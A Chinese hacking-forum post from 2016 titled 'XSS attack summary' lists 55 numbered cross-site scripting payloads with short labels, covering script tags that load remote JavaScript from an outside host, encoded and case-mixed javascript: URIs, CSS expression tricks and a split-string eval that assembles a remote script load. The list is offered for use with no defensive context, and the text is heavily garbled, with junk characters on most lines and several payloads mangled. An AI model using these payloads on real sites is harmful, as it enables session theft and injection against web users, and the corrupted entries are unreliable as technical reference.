中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入
. R- E- |2 d6 z# k* x  [<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- l! ]2 i6 C6 r(99)另类弹框
' C' R! K* R6 ?) t0 }0 E<q/oncut=alert()>11 y1 b5 v$ Q$ b# a/ v2 c3 Q
<s/onclick=alert()>b6 b" l6 h6 P% W' c) Y. y
<XSS=" onclick="alert(1)//">clickme</SSX=">
0 @7 P- M/ P3 x6 T7 T" ^  `. y <zzz onclick=alert`1`>clickme</zzz> , i& v% E3 ~$ n- j/ z% t% o$ U) Y
<a onclick=alert`1`>clickme</a>0 s, B* _) f' y: C
<a=">clickme</a=">
! P. X& J& k& Y9 D$ q<a=">clickme</a>% D$ g7 D6 L' h) j  S* D
<z=">clickme</z=">
+ ^" ]& z2 a9 g/ E8 p* \<z onclick=alert`1`>clickme</z>  w2 U1 [% }6 B: _; |0 K& Q
5 o3 k% i0 j* Q. B9 y
(2)IMG标签XSS使用JavaScript命令  T$ c+ X. X% U- y2 h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- c+ P- R: s6 `  B! y

( A  B% D* Y! ^3 E(3)IMG标签无分号无引号/ _: Z/ m1 x" t
<IMG SRC=javascript:alert(‘XSS’)>
" a% U4 ^" D: f$ m5 [& C' Y  j; z9 n+ m; O
(4)IMG标签大小写不敏感/ |& g( d7 |9 y/ J; u6 p
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 n- j2 U4 ~& x' }
6 X' u& G# z4 ^' E- u  x(5)HTML编码(必须有分号)
7 s; F" b& a: N<IMG SRC=javascript:alert(“XSS”)>
5 z+ [) l, |! N3 ^' o% B* G
7 Q2 T4 F# b) h5 ~6 j; L# n  y(6)修正缺陷IMG标签( L* Q4 z; o" I4 i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) S! j/ u/ M2 _
; Z, Z! k# H& p) s3 `6 n% l# V
(7)formCharCode标签(计算器)- r4 N# W. s% K6 ^' |. k6 ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 \% z) x+ W5 W! m- f7 K4 D' R
(8)UTF-8的Unicode编码(计算器)' U" e7 g( y! O/ h
<IMG SRC=jav..省略..S')>$ F6 e4 x3 ?; d
! i! |5 ]9 [+ c9 T% e6 K8 ]6 v0 i
(9)7位的UTF-8的Unicode编码是没有分号的(计算器). s2 S" D, C) n* J
<IMG SRC=jav..省略..S')>
5 K& E6 [* c1 _- _; {5 P. s
: n0 p4 c0 C+ @) d! c1 E1 @: A(10)十六进制编码也是没有分号(计算器)1 F$ W3 ~: H$ l8 G! F
<IMG SRC=\'#\'" /span>
+ p# e/ N; M5 F1 W$ t- Y
1 L+ M7 y3 p1 N(11)嵌入式标签,将Javascript分开. i9 B+ \/ y- w  b' e) {
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* [' T# C5 Y8 b# {8 B" @. y% K
5 R' s  T- y+ w(12)嵌入式编码标签,将Javascript分开
8 Z& V! p* `" l, g+ H0 u% g! X<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 q" n8 H' Y  V- X1 j

4 |& j6 B0 L/ F& C(13)嵌入式换行符- A# s5 J% h* l7 x/ W% c
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ s! ]) A% |, P. n( y
6 u$ B/ B6 r7 J/ {(14)嵌入式回车
1 |( O' A7 m. C2 x# J<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 H+ H/ i$ k" y, T1 U3 O
/ a6 }# e. S% h# c+ X(15)嵌入式多行注入JavaScript,这是XSS极端的例子; e! r5 H. i* k
<IMG SRC=\'#\'" /span>1 E8 R% t7 I6 B% O
4 O5 t( o1 _7 H! Z3 _4 o
(16)解决限制字符(要求同页面)
$ q. S* u2 z3 @, w' D# k5 s<script>z=’document.’</script>
' @) G- Q8 Y2 z5 o* i- o( ~<script>z=z+’write(“‘</script>) H0 o! u+ D8 _% A
<script>z=z+’<script’</script>
0 _* C: X  N6 q<script>z=z+’ src=ht’</script>( b/ v! X- S2 ]6 Y9 H5 r
<script>z=z+’tp://ww’</script>5 a/ M& F" m+ o
<script>z=z+’w.shell’</script>+ q( H+ ~) h7 \2 |0 q( q& z( v
<script>z=z+’.net/1.’</script>
$ W& h3 y& ]. h0 k0 E4 _7 H<script>z=z+’js></sc’</script># R8 g' h0 X, g3 Q8 y
<script>z=z+’ript>”)’</script>* `8 w) E  ^* \7 ?$ A; D
<script>eval_r(z)</script>
" }0 Y) L1 z9 [$ g5 f' f4 D! b9 [4 z3 g+ `. l4 d
(17)空字符
5 G. E2 ]8 O9 Lperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 N2 B; u, S* [& `8 t" W1 s# u) n
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用" _0 T! c2 m+ N
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 P5 I: L5 O6 y" Z8 Q' V

3 U7 K: T+ v+ v& e+ A1 A: [& N7 R; p+ _(19)Spaces和meta前的IMG标签
& F  t; h3 d0 N! I) d( B/ {9 `, f<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>8 l1 X! ?! b6 s* V4 M. Z

4 ]% p2 O+ L2 ^! N- Z(20)Non-alpha-non-digit XSS! r7 P; ]! f) M5 Z
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>" c7 ]5 t+ g2 D$ J
* q, c: @" s& p' Z, {
(21)Non-alpha-non-digit XSS to 25 b, ~) f- z2 O+ d, V
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># G4 V  @# U' Q4 B* q( Q, Y- g: K
5 t$ `! |0 f; \
(22)Non-alpha-non-digit XSS to 3
  @2 g. r1 L1 t5 S<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>$ E8 K6 j/ d" o; o8 E
$ [8 f- C% _) M2 N' N
(23)双开括号
6 z; c/ n/ D9 b% d' R' [) J- s<<SCRIPT>alert(“XSS”);//<</SCRIPT>: p( _6 C/ J  N

; E- B: |$ \; a' T9 H5 p/ X4 L(24)无结束脚本标记(仅火狐等浏览器)
& e, h7 w! x! ~<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
  \6 ?* F  w4 r9 Q6 u" n# M  x/ r* g. ~( l% V
(25)无结束脚本标记2; e' F: w9 s1 w0 E' m$ N
<SCRIPT SRC=//3w.org/XSS/xss.js>
" I0 t' |) h2 b+ E2 P1 b* {3 r
(26)半开的HTML/JavaScript XSS* Z  i% y/ g+ k# H8 @/ J, m
<IMG SRC=\'#\'" /span>
6 t5 Y' W4 F! _6 m- }
# Q' @- C" O+ p  E) _(27)双开角括号
3 @* ?% Z' {, y: ]" ^+ w<iframe src=http://3w.org/XSS.html <
! L  t* J# w/ ?! b
( U( @, w- t; a4 F7 W7 W; O7 c  ~0 n(28)无单引号 双引号 分号
. n" ]: |, K) `4 j+ r0 W<SCRIPT>a=/XSS/1 j% w, k6 W# v, {9 k
alert(a.source)</SCRIPT>
" C) N# @: q3 [8 P. S/ A, \# S% i, p4 S
(29)换码过滤的JavaScript
$ }+ q$ H! B6 t6 d6 T\”;alert(‘XSS’);//
# J; ]: m: c9 ]/ c; P" {
& w  N/ d- ~1 N: s(30)结束Title标签; z7 g5 O  S5 t  |5 s' p) S- B
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>5 \1 z7 K, {' M/ o
, B8 n1 `3 k3 E" @6 {
(31)Input Image. h+ N4 `2 P% ~/ o
<INPUT SRC=\'#\'" /span>0 |3 O* n* e0 F8 W
6 B8 }4 `2 c5 J4 K
(32)BODY Image
! m! R" c& G4 a/ a( C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ E9 V5 g# _3 [  V. l9 s( T/ [/ O5 ?
(33)BODY标签
6 _1 s, @9 |! f) Z( ?<BODY(‘XSS’)>
) h8 x4 h! J" t8 Z
& z0 Y, F$ p0 X) I# l& p(34)IMG Dynsrc
3 D$ z3 B7 S, Z/ o9 B<IMG DYNSRC=\'#\'" /span>+ Q0 j% |5 n" X
$ t8 S$ B% T; a* x. ^
(35)IMG Lowsrc4 @& n1 I- R+ Q! A
<IMG LOWSRC=\'#\'" /span>
! _% C( p! {* V" A% }  K7 v& ]; C" I  A' P4 q8 M  J8 {
(36)BGSOUND
1 Y& S4 E5 p1 C& S<BGSOUND SRC=\'#\'" /span>
3 Q4 T. f1 x% o4 a
9 y" y9 s2 a# j0 w(37)STYLE sheet
7 [  K6 P2 N! |- |5 w<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" q) ]! a, r  @! l! e
. d: L, @& i+ I  Y' _1 n(38)远程样式表" ^1 f2 H  t" j) ^7 x6 g- Z) t) R) }
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ ]! h1 d" ?2 Q% n$ c! T: x3 c: {" `1 x3 y; C
(39)List-style-image(列表式)
9 Z9 Z9 w7 [* t( [% `: B2 Z<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 j' a# d6 _9 S0 I! g8 A; I' }$ S; ^5 O/ y. {" t
(40)IMG VBscript
5 ]$ \* B, X6 ]2 H<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! e6 C) s( ~3 G4 s. F) \! V; ]) f& n, f3 o  ?/ h3 V
(41)META链接url
) z! D1 d9 H" p( r$ n<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* E$ V& |  C4 B4 u: E+ |
  O1 e% w2 V# ?! c$ ?(42)Iframe
' _+ O: Z1 H' ]: N# |& n<IFRAME SRC=\'#\'" /IFRAME>6 I7 J$ a2 W( P* [+ J
0 C; R  d3 d$ C, {/ ^
(43)Frame
* y1 u0 J" t8 a5 ~% ?9 b3 k<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
% E/ M8 z  t. D
. s- [- _$ n5 G1 k(44)Table6 a+ f; c1 Z: F* G
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, e1 Y) N( f; \! F
' r2 O! r% m) f
(45)TD. K8 f& F% j1 Y! y) x! c9 R( q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 m) M2 H2 N+ h- y7 M0 `! @
0 f% P6 h2 h( S+ @) G9 Z
(46)DIV background-image; f  G/ {+ K. u5 s
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, G. W" k! k9 `: {1 b0 n* `. Q) t" l$ n, J0 k( O
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)# R' d$ J6 d2 w2 z+ C/ u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! w% I8 V6 o& a, J
# H3 V6 ^. e9 T/ W
(48)DIV expression  u9 u+ H. O$ ?( S! C
<DIV STYLE=”width: expression_r(alert(‘XSS’));”># i% A8 C! p* n6 f

( O+ R1 W5 L/ V. u8 ~. }' w(49)STYLE属性分拆表达
6 q2 O1 L$ w3 V; K% c<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 F: o1 E! y* v. E
+ j4 i8 }/ a& U
(50)匿名STYLE(组成:开角号和一个字母开头)- D* l; j, ?% f) H* Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: E5 Q" R; i1 S# f$ I% h. d) `" y8 I5 D8 J" F+ r; F6 p  r+ R' i, y: E$ X
(51)STYLE background-image
( s6 e9 L, W% ]: h<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>4 v: [6 d& w6 g5 p! `7 D( x& d
; k  e# B: `$ F5 V7 f% q
(52)IMG STYLE方式' r2 j$ \/ u- Q7 b: \
exppression(alert(“XSS”))’>) `7 j4 c( i! K" I
4 j8 @, D' n# N" L" T% w
(53)STYLE background
4 u8 |5 g1 u3 n<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 v: B$ l1 U' J  i' i. W& a9 W% x. ]) ^
(54)BASE
# U- ?% k" K% X* K$ b<BASE HREF=”javascript:alert(‘XSS’);//”>
8 \+ x2 c# F- o. z
& {  h( O- G" Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' }  |$ d+ U& j+ f, B- x2 x6 x$ a- r+ J; R<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
3 q: Z0 E% D2 d) b' M



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2